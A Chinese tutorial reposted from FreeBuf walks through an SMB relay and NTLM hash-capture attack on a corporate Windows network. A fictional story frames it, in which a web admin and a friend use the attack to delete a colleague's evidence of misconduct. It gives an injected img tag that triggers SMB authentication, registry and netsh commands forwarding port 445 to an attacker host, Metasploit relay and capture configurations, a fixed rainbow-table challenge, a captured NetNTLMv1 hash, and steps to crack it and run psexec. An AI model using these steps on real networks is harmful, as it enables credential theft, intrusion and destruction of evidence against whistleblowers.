内网穿透Windows(SMB)自认证的利用

SMB又名网络文件共享文件,顾名思义其作用是用于用户与服务端之间的文件交互。默认端口为139,445。SMB的认证过程在这里就不重复描述了,具体可以看我上一篇写的文章,路由器抓包分析之SMB篇。在认证的时候细心的同学一定会发现在Windows下访问SMB服务器会默认使用当前用户hash去向SMB服务器发起认证。下面的实验便与这个机制有关。

实验环境:

windows 7 (smb server) 192.168.0.100 window7(bob管理的网站) 192.168.0.2 kali(攻击机/路人甲) 192.168.0.122(因为懒直接用同一网段IP了,大家可以假装这台是外网机器)

实验模拟:Bob是公司网站管理员,一天同部门的Alice发现Bob跟Boss老婆有一腿,决定向BOSS举报。并把证据上传到了SMB服务器,Bob知道后急忙到SMB服务器上查看,结果发现自己没有权限访问,于是急忙向好哥们路人甲救助。路人甲知道情况后一阵思考,决定用SMB中继来窃取凭证登陆SMB服务器,简单画一下原理图。

正常认证

如图1为正常认证过程。

中继认证

如图2所示为以bob的网站服务器作为攻击机,但是服务器上存在杀毒软件,所以失败。

穿透内网中继认证

如图3所示为以Bob的服务器为代理,把服务器的445端口转发到外网VPS,再以VPS为攻击机进行中继攻击。

首先在公司主页上插入一段JS<img src=//192.168.0.2 hidden="看不见我">。因为Bob是网站管理员所以插入代码并不难,192.168.0.2是Bob管理的网站服务器,在Bob的公司每个人上班都需到官网打卡签到,前面也说到了SMB自动认证的机制,所以只要员工用IE(chrome和firefox亲测无效)访问公司官网就会进行自动认证。

原本想在网站服务器上直接装msf完成攻击的,但是Bob公司买了某60牌的杀毒软件。一装就会触发警报,所以路人甲决定把端口转发出来。

由于445是默认端口,要转发出来首先要停用服务。

Bob's web server配置:

打开注册表,在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters中添加SMBDeviceEnabled并设置值为0:

更改注册表

接着打开服务,找到server项,停止server服务,并在属性更改启动类型为禁用。

服务

重启后就会发现445端口被关闭了。接着就可以把445端口转发至外网。

管理员运行:

netsh interface portproxyadd v4tov4  listenport=445connectaddress=192.168.0.122 connectport=8080

端口转发

外网VPS/攻击机上配置:

启动msf

use exploit/windows/smb/smb_relay set smbhost 192.168.0.100 set srvport 8080
这里少了一步内网转发,可以用ants,ew,lcx,web代理等等等把内网代理转发到外网。

配置msf

接着运行等待,果不其然,在第二天早上所有员工打卡之后,终于抓到了有权限登陆SMB服务器的hash并进行中继,拿到了smb服务器的权限,成功删除了证据。

成功拿到SMB服务器权

实验模拟2:

上面说到Alice发现Bob与BOSS老婆有一腿,然后Alice把证据上传到了SMB服务器准备举报,在Bob的好哥们路人甲的帮助下删除了证据。但是Bob仍旧担心Alice的PC机内会存有证据的备份,Bob只能继续救助自己的好哥们路人甲。

路人甲通过Bob知道了Alice在内网的IP为192.168.0.3。首先路人甲用smb_touch扫描192.168.0.3的445端口,发现Alice的PC竟然用的是XP,都2019了竟然还有人用XP。既然能访问445还是XP系统直接使用永恒之蓝对其进行攻击,发现攻击失败。背后通过Bob得知全公司的内网PC都安装了某60的杀毒软件。

未命名

某60为XP保驾护航,既然安装了某60的杀毒软件,许多攻击都无法进行,只能另想办法,于是路人甲便想到了把自己的攻击机伪 装SMB服务器,让其他用户向其认证进行抓取hash。原理图2所示:

原理图

Bob web server 配置:

1.在Web首页上加上js代码

2.关闭445端口,将445端口转发到192.168.0.122的8080端口。(因为装了某60杀毒软件,需要转发端口到外网,具体操作见上一篇文章)。

路人甲VPS:

启动msf并配置:

use auxiliary/server/capture/smb set srvport 8080 exploit

msf配置

如图11所示这里我们可以看到配置中有challenge这一项,这里之所以把challenge设为1122334455667788是因为已经有人通过这个挑战值生成了彩虹表,这样可以减少跑hash所花费的时间。

配置完之后只需静静等待Alice明天打卡上班就可以抓到她的hash了。

成功抓取hash值

通过组合hash得到Net-ntlmv1:

Administrator::FUCK1:6822b126aac81581dbcc3576a52dc4612f85252cc731bb25:a77b6fbd0247c656be59e409ae3a01c07ca6bbc11dec9322:1122334455667788
接着把hash扔进hashcat跑出明文密码,利用psexec通过445端口对Alice机子进行命令执行,然后全盘搜索,成功删除了证据文件。

*本文作者:꧁,转载请注明来自FreeBuf.COM

本文分享自微信公众号 - FreeBuf(freebuf)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-04-23

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏优惠券

在腾讯云上使用织梦仿站教程(附腾讯云优惠券)

织梦作为一套强大的cms系统,被很多人拿来建设网站,同时由于织梦标签自由,灵活的特点,很多人拿它来仿站用,今天小编就来教大家怎么用织梦仿站-首页的仿制。

19830
来自专栏CRM日记本

Salesforce 发布数字广告2020——广告主应该去衡量的三个营销指标

91%的广告主已经拥有或在未来采用数据管理平台(DMP),营销界正采取行动去捕捉,统一和激活消费者数据。

13620
来自专栏老蒋专栏

13个小技巧用来提高WordPress程序网站的访问速度

如今我们做网站大部分直接使用开源CMS程序就可以实现,且在众多开源程序中WordPress应该是被应用最多的,没有之一。前几天也有看到新闻,WP程序在众多优秀网...

18440
来自专栏站长去哪儿

网站备案前一定要检查这些域名隐患和网站名称规范

网站备案是域名+主机的一体化过程,而域名是网站备案的载体。一般网站备案的展现形式是在域名上的。所以域名对网站备案是很重要的哦!

69860
来自专栏站长去哪儿

深度解析域名劫持原因及应对方法

关于网站,个人感觉最头痛的就两个吧,一个是ddos(攻击),一个就是劫持(流量)了,因为前者是打不开,后者呢打开了但是进的是别人的网页,感觉很头痛。大家都知道的...

37830
来自专栏CRM日记本

数字化肢体语言:线索得分的秘密因素

线索评分是增加转化率的诀窍:如果你希望确保销售线索按时保质的交付给你的销售团队则需要规范交接条件。 我们将此称之为自动化的质量保证。

9130
来自专栏CRM日记本

不知道如何衡量会员的价值?来学习下RFM模型

很多直接面向消费者的企业,也是我们常说的To C的企业通常都会建立自己的会员体系,并在线上和线下的渠道中积累了大量的会员数据。但是如何能够更好的利用这些会员数据...

14630
来自专栏叉叉敌

如何给个人网站添加免费的SSL

最近站点总是被劫持,劫持什么意思喃?按照官方的说法就是所谓的网站劫持就是打开一个网站,出现一个不属于网站范畴的广告,或者是无法跳转到某个不属于这个范畴的网页。 ...

14320
来自专栏站长去哪儿

浅析网站不被搜索引擎收录的原因

以前总是说,怎样让搜索引擎收录我们的网站,如何让搜索引擎带来流量,但是总有小伙伴不走寻常路,或者这种不寻常路是对的,百度为什么不收录我的网站呢?我也提交了啊,也...

18230
来自专栏站长去哪儿

站长千万别点这个链接,很有可能是黑客故意的

很多小伙伴们可能认为,当我安装网站源码后,把后台路径改了下,别人是否就不知道了呢?我们以织梦为例子,把默认的/dede修改成/myadmin后别人就真的不知道你...

17330

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励